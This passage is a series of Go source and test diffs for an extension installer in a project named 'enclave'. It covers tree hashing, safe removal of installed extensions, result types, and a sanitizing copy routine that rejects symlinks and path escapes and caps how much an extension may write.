+// The value is persisted in every installed extension's sidecar and compared
+// against on the next update, so changing how the digest is built would make
+// every already-installed extension report as locally modified.
+func TestTreeHashPinnedValue(t *testing.T) {
+	dir := filepath.Join(t.TempDir(), "foo")
+	writeFixture(t, filepath.Join(dir, "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: foo\n", 0o644)
+	writeFixture(t, filepath.Join(dir, "install.sh"), "#!/bin/sh\necho hi\n", 0o755)
+	writeFixture(t, filepath.Join(dir, "entrypoint.d", "10-setup.sh"), "#!/bin/sh\n", 0o755)
+	writeFixture(t, filepath.Join(dir, "files", "home", ".config", "foo.toml"), "a = 1\n", 0o644)
+	writeFixture(t, filepath.Join(dir, "empty"), "", 0o644)
+	writeFixture(t, filepath.Join(dir, model.ExtensionSourceFilename), `{"commit":"whatever"}`, 0o644)
+	for path, mode := range map[string]os.FileMode{
+		"spec.yaml":                   0o644,
+		"install.sh":                  0o755,
+		"entrypoint.d/10-setup.sh":    0o755,
+		"files/home/.config/foo.toml": 0o644,
+		"empty":                       0o644,
+		model.ExtensionSourceFilename: 0o644,
+	} {
+		if err := os.Chmod(filepath.Join(dir, filepath.FromSlash(path)), mode); err != nil {
+			t.Fatalf("chmod %s: %v", path, err)
+		}
+	}
+
+	const want = "sha256:02aecf8bd96ebe0a9e1b58b923d44b947d7d86317cbf132599ce3a830d7ad878"
+	got, err := TreeHash(dir)
+	if err != nil {
+		t.Fatalf("TreeHash: %v", err)
+	}
+	if got != want {
+		t.Fatalf("TreeHash = %q, want %q", got, want)
+	}
+}
+
+func TestTreeHashIgnoresSidecar(t *testing.T) {
+	dir := fixtureExtension(t)
+	before, err := TreeHash(dir)
+	if err != nil {
+		t.Fatalf("TreeHash: %v", err)
+	}
+	writeFixture(t, filepath.Join(dir, model.ExtensionSourceFilename), `{"commit":"whatever"}`, 0o644)
+	after, err := TreeHash(dir)
+	if err != nil {
+		t.Fatalf("TreeHash: %v", err)
+	}
+	if before != after {
+		t.Fatalf("tree hash changed when only the sidecar was added: %s -> %s", before, after)
+	}
+}
+
+func TestTreeHashTracksContentAndMode(t *testing.T) {
+	dir := fixtureExtension(t)
+	base, err := TreeHash(dir)
+	if err != nil {
+		t.Fatalf("TreeHash: %v", err)
+	}
+
+	writeFixture(t, filepath.Join(dir, "install.sh"), "#!/bin/sh\necho changed\n", 0o755)
+	changedContent, err := TreeHash(dir)
+	if err != nil {
+		t.Fatalf("TreeHash: %v", err)
+	}
+	if changedContent == base {
+		t.Fatal("tree hash unchanged after a content edit")
+	}
+
+	if err := os.Chmod(filepath.Join(dir, "install.sh"), 0o644); err != nil {
+		t.Fatalf("chmod: %v", err)
+	}
+	changedMode, err := TreeHash(dir)
+	if err != nil {
+		t.Fatalf("TreeHash: %v", err)
+	}
+	if changedMode == changedContent {
+		t.Fatal("tree hash unchanged after dropping the execute bit")
+	}
+}
+
+func TestIsLocallyModified(t *testing.T) {
+	dir := fixtureExtension(t)
+	hash, err := TreeHash(dir)
+	if err != nil {
+		t.Fatalf("TreeHash: %v", err)
+	}
+	origin := Origin{TreeHash: hash}
+
+	modified, err := isLocallyModified(dir, origin)
+	if err != nil {
+		t.Fatalf("isLocallyModified: %v", err)
+	}
+	if modified {
+		t.Fatal("clean directory reported as modified")
+	}
+
+	writeFixture(t, filepath.Join(dir, "extra.txt"), "local edit\n", 0o644)
+	modified, err = isLocallyModified(dir, origin)
+	if err != nil {
+		t.Fatalf("isLocallyModified: %v", err)
+	}
+	if !modified {
+		t.Fatal("edited directory reported as clean")
+	}
+}
+
+func TestShortCommit(t *testing.T) {
+	if got := ShortCommit("a1b2c3d4e5f6a7b8"); got != "a1b2c3d" {
+		t.Fatalf("ShortCommit = %q", got)
+	}
+	if got := ShortCommit("abc"); got != "abc" {
+		t.Fatalf("ShortCommit of a short value = %q", got)
+	}
+}

--- a/internal/extinstall/remove.go
+++ b/internal/extinstall/remove.go
@@ -1,0 +1,76 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"context"
+	"fmt"
+	"path/filepath"
+
+	"enclave/internal/config"
+)
+
+// Remove deletes installed user extensions. Built-ins are never touched, and an
+// extension the installer did not put in place needs --force.
+func Remove(_ context.Context, env Env, req Request) ([]ActionResult, error) {
+	if len(req.Names) == 0 {
+		return nil, fmt.Errorf("name at least one %s extension to remove", req.Kind.Label())
+	}
+	inventory, err := Inventory(env.Paths, req.Kind, nil, InventoryProvenance)
+	if err != nil {
+		return nil, err
+	}
+
+	results := make([]ActionResult, 0, len(req.Names))
+	for _, name := range req.Names {
+		entry, ok := inventory[name]
+		if !ok {
+			return nil, fmt.Errorf("%s %q is not installed", req.Kind.Label(), name)
+		}
+		result, removeErr := removeOne(env, req, entry)
+		if removeErr != nil {
+			result = ActionResult{Name: name, Action: ActionFailed, Error: removeErr.Error()}
+		}
+		results = append(results, result)
+	}
+	return results, nil
+}
+
+func removeOne(env Env, req Request, entry Managed) (ActionResult, error) {
+	if entry.Source == config.SourceBuiltin {
+		return ActionResult{}, fmt.Errorf("a built-in %s cannot be removed", req.Kind.Label())
+	}
+	if entry.Origin == nil && !req.Force {
+		if entry.Problem != "" {
+			return ActionResult{}, fmt.Errorf("its provenance file could not be read; pass --force to delete it anyway")
+		}
+		return ActionResult{}, fmt.Errorf("not installed by enclave; pass --force to delete it anyway")
+	}
+
+	target := filepath.Join(env.kindDir(req.Kind), entry.Name)
+	if req.Interactive {
+		confirmed, err := env.confirm(fmt.Sprintf("Remove %s?", target))
+		if err != nil {
+			return ActionResult{}, err
+		}
+		if !confirmed {
+			return ActionResult{}, fmt.Errorf("aborted; nothing removed")
+		}
+	}
+	if err := removeInstalled(env, req.Kind, entry.Name); err != nil {
+		return ActionResult{}, err
+	}
+
+	_, _ = fmt.Fprintf(env.narrate(), "removed %s %q from %s\n", req.Kind.Label(), entry.Name, target)
+	if entry.Source == config.SourceOverride {
+		_, _ = fmt.Fprintf(env.narrate(), "the built-in %s %q is active again\n", req.Kind.Label(), entry.Name)
+	}
+	// Host state may belong to a reinstall.
+	_, _ = fmt.Fprintf(env.narrate(), "host config and state for %q were left untouched\n", entry.Name)
+	return ActionResult{Name: entry.Name, Action: ActionRemoved, Path: target}, nil
+}

--- a/internal/extinstall/remove.go
+++ b/internal/extinstall/remove.go
@@ -13,6 +13,7 @@ import (
 	"path/filepath"
 
 	"enclave/internal/config"
+	"enclave/internal/logx"
 )
 
 // Remove deletes installed user extensions. Built-ins are never touched, and an
@@ -38,6 +39,7 @@ func Remove(_ context.Context, env Env, req Request) ([]ActionResult, error) {
 		}
 		results = append(results, result)
 	}
+	env.summarize(env.Style, req.Kind.Label(), results, req.DryRun)
 	return results, nil
 }
 
@@ -53,8 +55,9 @@ func removeOne(env Env, req Request, entry Managed) (ActionResult, error) {
 	}
 
 	target := filepath.Join(env.kindDir(req.Kind), entry.Name)
+	env.section(env.Style, entry.Name, req.Kind.Label())
 	if req.Interactive {
-		confirmed, err := env.confirm(fmt.Sprintf("Remove %s?", target))
+		confirmed, err := env.confirm(fmt.Sprintf("%sRemove %s?", bodyIndent, target))
 		if err != nil {
 			return ActionResult{}, err
 		}
@@ -66,11 +69,11 @@ func removeOne(env Env, req Request, entry Managed) (ActionResult, error) {
 		return ActionResult{}, err
 	}
 
-	_, _ = fmt.Fprintf(env.narrate(), "removed %s %q from %s\n", req.Kind.Label(), entry.Name, target)
+	env.outcome(env.Style, markOK, logx.ColorGreen, "removed from %s", target)
 	if entry.Source == config.SourceOverride {
-		_, _ = fmt.Fprintf(env.narrate(), "the built-in %s %q is active again\n", req.Kind.Label(), entry.Name)
+		env.note(env.Style, "the built-in %s is active again", req.Kind.Label())
 	}
 	// Host state may belong to a reinstall.
-	_, _ = fmt.Fprintf(env.narrate(), "host config and state for %q were left untouched\n", entry.Name)
+	env.note(env.Style, "host config and state were left untouched")
 	return ActionResult{Name: entry.Name, Action: ActionRemoved, Path: target}, nil
 }

--- a/internal/extinstall/remove.go
+++ b/internal/extinstall/remove.go
@@ -27,19 +27,23 @@ func Remove(_ context.Context, env Env, req Request) ([]ActionResult, error) {
 		return nil, err
 	}
 
-	results := make([]ActionResult, 0, len(req.Names))
+	// Every name is checked before anything is deleted, so an unknown one in a
+	// list cannot leave the run reporting a failure for extensions it did remove.
 	for _, name := range req.Names {
-		entry, ok := inventory[name]
-		if !ok {
+		if _, ok := inventory[name]; !ok {
 			return nil, fmt.Errorf("%s %q is not installed", req.Kind.Label(), name)
 		}
-		result, removeErr := removeOne(env, req, entry)
+	}
+
+	results := make([]ActionResult, 0, len(req.Names))
+	for _, name := range req.Names {
+		result, removeErr := removeOne(env, req, inventory[name])
 		if removeErr != nil {
 			result = ActionResult{Name: name, Action: ActionFailed, Error: removeErr.Error()}
 		}
 		results = append(results, result)
 	}
-	env.summarize(env.Style, req.Kind.Label(), results, req.DryRun)
+	env.summarize(req.Kind.Label(), results, req.DryRun)
 	return results, nil
 }
 
@@ -55,7 +59,7 @@ func removeOne(env Env, req Request, entry Managed) (ActionResult, error) {
 	}
 
 	target := filepath.Join(env.kindDir(req.Kind), entry.Name)
-	env.section(env.Style, entry.Name, req.Kind.Label())
+	env.section(entry.Name, req.Kind.Label())
 	if req.Interactive {
 		confirmed, err := env.confirm(fmt.Sprintf("%sRemove %s?", bodyIndent, target))
 		if err != nil {
@@ -69,11 +73,11 @@ func removeOne(env Env, req Request, entry Managed) (ActionResult, error) {
 		return ActionResult{}, err
 	}
 
-	env.outcome(env.Style, markOK, logx.ColorGreen, "removed from %s", target)
+	env.outcome(markOK, logx.ColorGreen, "removed from %s", target)
 	if entry.Source == config.SourceOverride {
-		env.note(env.Style, "the built-in %s is active again", req.Kind.Label())
+		env.note("the built-in %s is active again", req.Kind.Label())
 	}
 	// Host state may belong to a reinstall.
-	env.note(env.Style, "host config and state were left untouched")
+	env.note("host config and state were left untouched")
 	return ActionResult{Name: entry.Name, Action: ActionRemoved, Path: target}, nil
 }

--- a/internal/extinstall/remove_test.go
+++ b/internal/extinstall/remove_test.go
@@ -202,6 +202,22 @@ func TestRemoveUnknownName(t *testing.T) {
 	}
 }
 
+// TestRemoveUnknownNameRemovesNothing keeps the result envelope honest: an
+// unknown name fails the run before anything is deleted, so a consumer never
+// reads a failure for a list that was in fact partly removed.
+func TestRemoveUnknownNameRemovesNothing(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	installFoo(t, env)
+
+	if _, err := Remove(context.Background(), env, removeRequest("foo", "nope")); err == nil {
+		t.Fatal("Remove accepted a name that is not installed")
+	}
+	if _, statErr := os.Stat(filepath.Join(env.Paths.UserFeaturesDir, "foo")); statErr != nil {
+		t.Fatalf("a run that reported failure removed an extension anyway: %v", statErr)
+	}
+}
+
 func TestRemoveRequiresNames(t *testing.T) {
 	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
 	env, _ := testEnv(t, fetcher, "")

--- a/internal/extinstall/remove_test.go
+++ b/internal/extinstall/remove_test.go
@@ -1,0 +1,228 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"context"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"enclave/internal/model"
+)
+
+func removeRequest(names ...string) Request {
+	return Request{Kind: model.KindFeature, Op: OpRemove, Names: names, Yes: true}
+}
+
+func TestRemoveDeletesManagedExtension(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	installFoo(t, env)
+
+	results, err := Remove(context.Background(), env, removeRequest("foo"))
+	if err != nil {
+		t.Fatalf("Remove: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionRemoved {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+	if _, statErr := os.Stat(filepath.Join(env.Paths.UserFeaturesDir, "foo")); !os.IsNotExist(statErr) {
+		t.Fatal("extension directory survived removal")
+	}
+}
+
+// TestRemoveDeletesExtensionWithUnloadableSpec keeps remove usable as the
+// recovery path it is meant to be: an upstream schemaVersion bump is enough to
+// stop a spec loading, and an extension that can no longer be loaded still
+// occupies a directory that has to be removable without a hand-written rm -rf.
+func TestRemoveDeletesExtensionWithUnloadableSpec(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	installFoo(t, env)
+
+	installed := filepath.Join(env.Paths.UserFeaturesDir, "foo")
+	writeFixture(t, filepath.Join(installed, "spec.yaml"), "schemaVersion: \"2\"\nkind: mixin\nname: foo\n", 0o644)
+
+	results, err := Remove(context.Background(), env, removeRequest("foo"))
+	if err != nil {
+		t.Fatalf("Remove: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionRemoved {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+	if _, statErr := os.Stat(installed); !os.IsNotExist(statErr) {
+		t.Fatal("extension directory survived removal")
+	}
+}
+
+func TestRemoveRefusesUnmanagedWithoutForce(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	handmade := filepath.Join(env.Paths.UserFeaturesDir, "handmade")
+	writeFixture(t, filepath.Join(handmade, "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: handmade\n", 0o644)
+
+	results, err := Remove(context.Background(), env, removeRequest("handmade"))
+	if err == nil && !HasFailure(results) {
+		t.Fatalf("Remove deleted an unmanaged extension: %s", fmtResults(results))
+	}
+	message := ""
+	if err != nil {
+		message = err.Error()
+	} else {
+		message = results[0].Error
+	}
+	if !strings.Contains(message, "not installed by enclave") {
+		t.Fatalf("error = %q, want it to say the extension was not installed by enclave", message)
+	}
+	assertResultsDoNotNameExtensions(t, results)
+	if _, statErr := os.Stat(handmade); statErr != nil {
+		t.Fatalf("unmanaged extension was deleted: %v", statErr)
+	}
+
+	forced := removeRequest("handmade")
+	forced.Force = true
+	results, err = Remove(context.Background(), env, forced)
+	if err != nil {
+		t.Fatalf("Remove --force: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionRemoved {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+}
+
+func TestRemoveRefusesCorruptSidecarWithoutForce(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	broken := filepath.Join(env.Paths.UserFeaturesDir, "broken")
+	writeFixture(t, filepath.Join(broken, "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: broken\n", 0o644)
+	writeFixture(t, filepath.Join(broken, model.ExtensionSourceFilename), "{not valid json", 0o644)
+
+	results, err := Remove(context.Background(), env, removeRequest("broken"))
+	if err == nil && !HasFailure(results) {
+		t.Fatalf("Remove deleted an extension with an unreadable sidecar: %s", fmtResults(results))
+	}
+	message := ""
+	if err != nil {
+		message = err.Error()
+	} else {
+		message = results[0].Error
+	}
+	if !strings.Contains(message, "provenance file could not be read") {
+		t.Fatalf("error = %q, want it to distinguish an unreadable sidecar from a genuinely unmanaged extension", message)
+	}
+	if strings.Contains(message, "not installed by enclave") {
+		t.Fatalf("error = %q, a corrupt sidecar is not the same as never having been installed", message)
+	}
+	assertResultsDoNotNameExtensions(t, results)
+	if _, statErr := os.Stat(broken); statErr != nil {
+		t.Fatalf("extension with unreadable sidecar was deleted: %v", statErr)
+	}
+
+	forced := removeRequest("broken")
+	forced.Force = true
+	results, err = Remove(context.Background(), env, forced)
+	if err != nil {
+		t.Fatalf("Remove --force: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionRemoved {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+}
+
+// TestRemoveNeverReadsInstalledContent pins that removal consults an
+// extension's provenance and nothing else. Hashing the installed tree would
+// let the unreadable dangling symlink below downgrade a perfectly managed
+// extension to "provenance could not be read; pass --force".
+func TestRemoveNeverReadsInstalledContent(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	installFoo(t, env)
+
+	installed := filepath.Join(env.Paths.UserFeaturesDir, "foo")
+	if err := os.Symlink(filepath.Join(installed, "gone"), filepath.Join(installed, "dangling")); err != nil {
+		t.Fatalf("Symlink: %v", err)
+	}
+
+	results, err := Remove(context.Background(), env, removeRequest("foo"))
+	if err != nil {
+		t.Fatalf("Remove: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionRemoved {
+		t.Fatalf("results = %s, want the extension removed without reading its content", fmtResults(results))
+	}
+}
+
+func TestRemoveRefusesBuiltinOnly(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	writeFixture(t, filepath.Join(env.Paths.FeaturesDir, "builtin", "spec.yaml"),
+		"schemaVersion: \"1\"\nkind: mixin\nname: builtin\n", 0o644)
+
+	results, err := Remove(context.Background(), env, removeRequest("builtin"))
+	if err == nil && !HasFailure(results) {
+		t.Fatalf("Remove accepted a built-in: %s", fmtResults(results))
+	}
+	if _, statErr := os.Stat(filepath.Join(env.Paths.FeaturesDir, "builtin", "spec.yaml")); statErr != nil {
+		t.Fatalf("built-in was touched: %v", statErr)
+	}
+}
+
+func TestRemoveOverlayReportsBuiltinRestored(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, out := testEnv(t, fetcher, "")
+	writeFixture(t, filepath.Join(env.Paths.FeaturesDir, "foo", "spec.yaml"), fooFeatureSpec, 0o644)
+	// Overlaying a built-in requires --force: installing "foo" here would
+	// otherwise shadow the built-in fixture just written above.
+	req := addRequest()
+	req.Force = true
+	if _, err := Add(context.Background(), env, req); err != nil {
+		t.Fatalf("seed install: %v", err)
+	}
+
+	if _, err := Remove(context.Background(), env, removeRequest("foo")); err != nil {
+		t.Fatalf("Remove: %v", err)
+	}
+	if !strings.Contains(out.String(), "built-in") {
+		t.Fatalf("removal did not mention the restored built-in:\n%s", out.String())
+	}
+}
+
+func TestRemoveUnknownName(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	if _, err := Remove(context.Background(), env, removeRequest("nope")); err == nil {
+		t.Fatal("Remove accepted a name that is not installed")
+	}
+}
+
+func TestRemoveRequiresNames(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	if _, err := Remove(context.Background(), env, removeRequest()); err == nil {
+		t.Fatal("Remove with no names was accepted")
+	}
+}
+
+func TestRemoveDeclinedKeepsFiles(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "n\n")
+	installFoo(t, env)
+
+	req := removeRequest("foo")
+	req.Yes = false
+	req.Interactive = true
+	results, err := Remove(context.Background(), env, req)
+	if err == nil && !HasFailure(results) {
+		t.Fatalf("declining still removed: %s", fmtResults(results))
+	}
+	if _, statErr := os.Stat(filepath.Join(env.Paths.UserFeaturesDir, "foo")); statErr != nil {
+		t.Fatalf("declined removal deleted files: %v", statErr)
+	}
+}

--- a/internal/extinstall/request.go
+++ b/internal/extinstall/request.go
@@ -1,0 +1,37 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import "enclave/internal/model"
+
+// Op is the requested operation. It travels from the CLI layer to the app
+// handlers alongside Kind.
+type Op string
+
+const (
+	OpList   Op = "list"
+	OpAdd    Op = "add"
+	OpRemove Op = "remove"
+	OpUpdate Op = "update"
+)
+
+// Request is the parsed CLI state for one extension-management invocation.
+type Request struct {
+	Kind        model.ExtensionKind
+	Op          Op
+	Source      string
+	Path        string
+	Ref         string
+	Names       []string
+	All         bool
+	Yes         bool
+	Force       bool
+	DryRun      bool
+	JSON        bool
+	Interactive bool
+}

--- a/internal/extinstall/result.go
+++ b/internal/extinstall/result.go
@@ -7,6 +7,8 @@
 
 package extinstall
 
+import "slices"
+
 // Per-extension outcomes. These strings are an integration contract: they
 // appear verbatim in `--json` output.
 const (
@@ -33,10 +35,5 @@ type ActionResult struct {
 // HasFailure reports whether any extension failed, so a caller can pick a
 // non-zero exit code while still keeping the successes.
 func HasFailure(results []ActionResult) bool {
-	for _, result := range results {
-		if result.Action == ActionFailed {
-			return true
-		}
-	}
-	return false
+	return slices.ContainsFunc(results, func(r ActionResult) bool { return r.Action == ActionFailed })
 }

--- a/internal/extinstall/result.go
+++ b/internal/extinstall/result.go
@@ -1,0 +1,42 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+// Per-extension outcomes. These strings are an integration contract: they
+// appear verbatim in `--json` output.
+const (
+	ActionInstalled = "installed"
+	ActionUpdated   = "updated"
+	ActionUnchanged = "unchanged"
+	ActionRemoved   = "removed"
+	ActionSkipped   = "skipped"
+	ActionFailed    = "failed"
+)
+
+// ActionResult is what happened to one extension. The field names are an
+// integration contract: they appear verbatim in the `--json` result envelope,
+// which internal/app marshals.
+type ActionResult struct {
+	Name     string   `json:"name"`
+	Action   string   `json:"action"`
+	Commit   string   `json:"commit,omitempty"`
+	Path     string   `json:"path,omitempty"`
+	Warnings []string `json:"warnings,omitempty"`
+	Error    string   `json:"error,omitempty"`
+}
+
+// HasFailure reports whether any extension failed, so a caller can pick a
+// non-zero exit code while still keeping the successes.
+func HasFailure(results []ActionResult) bool {
+	for _, result := range results {
+		if result.Action == ActionFailed {
+			return true
+		}
+	}
+	return false
+}

--- a/internal/extinstall/sanitize.go
+++ b/internal/extinstall/sanitize.go
@@ -1,0 +1,136 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"fmt"
+	"io"
+	"io/fs"
+	"os"
+	"path/filepath"
+
+	"enclave/internal/util"
+)
+
+// copyLimits bounds what a remote extension may write onto the host.
+type copyLimits struct {
+	MaxFiles int
+	MaxBytes int64
+}
+
+// defaultLimits are generous for real extensions (scripts, specs, templates,
+// skills) and tight enough that a mistargeted source cannot fill the disk.
+func defaultLimits() copyLimits {
+	return copyLimits{MaxFiles: 1000, MaxBytes: 10 << 20}
+}
+
+// copyExtensionTree copies srcDir to dstDir under strict rules: regular files
+// and directories only, no symlinks or other special entries, nothing escaping
+// the destination, .git skipped, modes normalized, and the caps enforced.
+// Extension content is untrusted, so every rejection names the offending path.
+// On failure, partially copied files may remain in dstDir; callers must discard
+// the destination wholesale if the copy fails.
+func copyExtensionTree(srcDir string, dstDir string, limits copyLimits) error {
+	// Lstat, not Stat: a symlinked source root must not be treated as a real
+	// directory just because it resolves to one. Every path check below this
+	// point (HasPathTraversal, PathStrictlyWithin) assumes srcDir itself is a
+	// genuine directory inside the checkout, not a link elsewhere.
+	info, err := os.Lstat(srcDir)
+	if err != nil {
+		return err
+	}
+	if info.Mode()&os.ModeSymlink != 0 {
+		return fmt.Errorf("%s is a symlink", srcDir)
+	}
+	if !info.IsDir() {
+		return fmt.Errorf("%s is not a directory", srcDir)
+	}
+	if err := os.MkdirAll(dstDir, 0o750); err != nil {
+		return err
+	}
+
+	files := 0
+	var totalBytes int64
+	return filepath.WalkDir(srcDir, func(path string, entry fs.DirEntry, err error) error {
+		if err != nil {
+			return err
+		}
+		if path == srcDir {
+			return nil
+		}
+		rel, relErr := filepath.Rel(srcDir, path)
+		if relErr != nil {
+			return relErr
+		}
+		if entry.Name() == ".git" {
+			if entry.IsDir() {
+				return filepath.SkipDir
+			}
+			// A gitlink file (submodule marker) at this name is not a real
+			// extension file either; skip it the same as the directory form.
+			return nil
+		}
+		if util.HasPathTraversal(rel) {
+			return fmt.Errorf("refusing %s: path escapes the extension directory", rel)
+		}
+		target := filepath.Join(dstDir, rel)
+		if !util.PathStrictlyWithin(dstDir, target) {
+			return fmt.Errorf("refusing %s: resolves outside %s", rel, dstDir)
+		}
+
+		if entry.IsDir() {
+			return os.MkdirAll(target, 0o750)
+		}
+		if !entry.Type().IsRegular() {
+			return fmt.Errorf("refusing %s: only regular files and directories are installed (found %s)", rel, entry.Type())
+		}
+
+		fileInfo, infoErr := entry.Info()
+		if infoErr != nil {
+			return infoErr
+		}
+		files++
+		totalBytes += fileInfo.Size()
+		if files > limits.MaxFiles {
+			return fmt.Errorf("extension has more than %d files", limits.MaxFiles)
+		}
+		if totalBytes > limits.MaxBytes {
+			return fmt.Errorf("extension exceeds %d bytes", limits.MaxBytes)
+		}
+		return copySanitizedFile(path, target, fileInfo.Mode())
+	})
+}
+
+func copySanitizedFile(src string, dst string, mode os.FileMode) error {
+	if err := os.MkdirAll(filepath.Dir(dst), 0o750); err != nil {
+		return err
+	}
+	// #nosec G304 -- src comes from walking the caller's staging directory.
+	in, err := os.Open(src)
+	if err != nil {
+		return err
+	}
+	defer func() { _ = in.Close() }()
+
+	perm := os.FileMode(0o640)
+	if mode.Perm()&0o111 != 0 {
+		// Extension scripts must stay executable: install.sh and entrypoint.d
+		// hooks are executed inside the image.
+		perm = 0o750
+	}
+	// #nosec G304 -- dst is constructed and checked by the caller with PathStrictlyWithin.
+	out, err := os.OpenFile(dst, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, perm)
+	if err != nil {
+		return err
+	}
+	if _, err := io.Copy(out, in); err != nil {
+		_ = out.Close()
+		return err
+	}
+	return out.Close()
+}

--- a/internal/extinstall/sanitize_test.go
+++ b/internal/extinstall/sanitize_test.go
@@ -1,0 +1,166 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"io/fs"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+func TestCopyExtensionTreeCopiesContentAndNormalizesModes(t *testing.T) {
+	src := t.TempDir()
+	dst := filepath.Join(t.TempDir(), "out")
+	writeFixture(t, filepath.Join(src, "spec.yaml"), "schemaVersion: \"1\"\n", 0o600)
+	writeFixture(t, filepath.Join(src, "install.sh"), "#!/bin/sh\n", 0o700)
+	writeFixture(t, filepath.Join(src, "templates", "settings.json"), "{}\n", 0o644)
+
+	if err := copyExtensionTree(src, dst, defaultLimits()); err != nil {
+		t.Fatalf("copyExtensionTree: %v", err)
+	}
+	if got := countFiles(t, dst); got != 3 {
+		t.Errorf("copied %d files, want 3", got)
+	}
+
+	spec, err := os.Stat(filepath.Join(dst, "spec.yaml"))
+	if err != nil {
+		t.Fatalf("stat spec.yaml: %v", err)
+	}
+	if spec.Mode().Perm()&0o111 != 0 {
+		t.Errorf("spec.yaml mode = %v, want no execute bit", spec.Mode().Perm())
+	}
+	script, err := os.Stat(filepath.Join(dst, "install.sh"))
+	if err != nil {
+		t.Fatalf("stat install.sh: %v", err)
+	}
+	if script.Mode().Perm()&0o100 == 0 {
+		t.Errorf("install.sh mode = %v, want owner execute", script.Mode().Perm())
+	}
+	if _, err := os.Stat(filepath.Join(dst, "templates", "settings.json")); err != nil {
+		t.Fatalf("nested file missing: %v", err)
+	}
+}
+
+func TestCopyExtensionTreeSkipsGitDir(t *testing.T) {
+	src := t.TempDir()
+	dst := filepath.Join(t.TempDir(), "out")
+	writeFixture(t, filepath.Join(src, "spec.yaml"), "x\n", 0o644)
+	writeFixture(t, filepath.Join(src, ".git", "config"), "[core]\n", 0o644)
+
+	if err := copyExtensionTree(src, dst, defaultLimits()); err != nil {
+		t.Fatalf("copyExtensionTree: %v", err)
+	}
+	if got := countFiles(t, dst); got != 1 {
+		t.Fatalf("copied %d files, want 1 (.git must be skipped)", got)
+	}
+	if _, err := os.Stat(filepath.Join(dst, ".git")); !os.IsNotExist(err) {
+		t.Fatalf(".git was copied")
+	}
+}
+
+// TestCopyExtensionTreeSkipsGitlinkFile: a submodule gitlink is a regular
+// FILE named ".git", not a directory, so a directory-only skip would install
+// it as ordinary extension content.
+func TestCopyExtensionTreeSkipsGitlinkFile(t *testing.T) {
+	src := t.TempDir()
+	dst := filepath.Join(t.TempDir(), "out")
+	writeFixture(t, filepath.Join(src, "spec.yaml"), "x\n", 0o644)
+	writeFixture(t, filepath.Join(src, ".git"), "gitdir: ../.git/modules/sub\n", 0o644)
+
+	if err := copyExtensionTree(src, dst, defaultLimits()); err != nil {
+		t.Fatalf("copyExtensionTree: %v", err)
+	}
+	if got := countFiles(t, dst); got != 1 {
+		t.Fatalf("copied %d files, want 1 (the .git gitlink file must be skipped)", got)
+	}
+	if _, err := os.Stat(filepath.Join(dst, ".git")); !os.IsNotExist(err) {
+		t.Fatalf(".git gitlink file was copied")
+	}
+}
+
+// TestCopyExtensionTreeRejectsSymlinkedSourceRoot: os.Stat follows symlinks,
+// so a symlinked source root would be accepted as a real directory without
+// ever proving it is one inside the checkout.
+func TestCopyExtensionTreeRejectsSymlinkedSourceRoot(t *testing.T) {
+	real := t.TempDir()
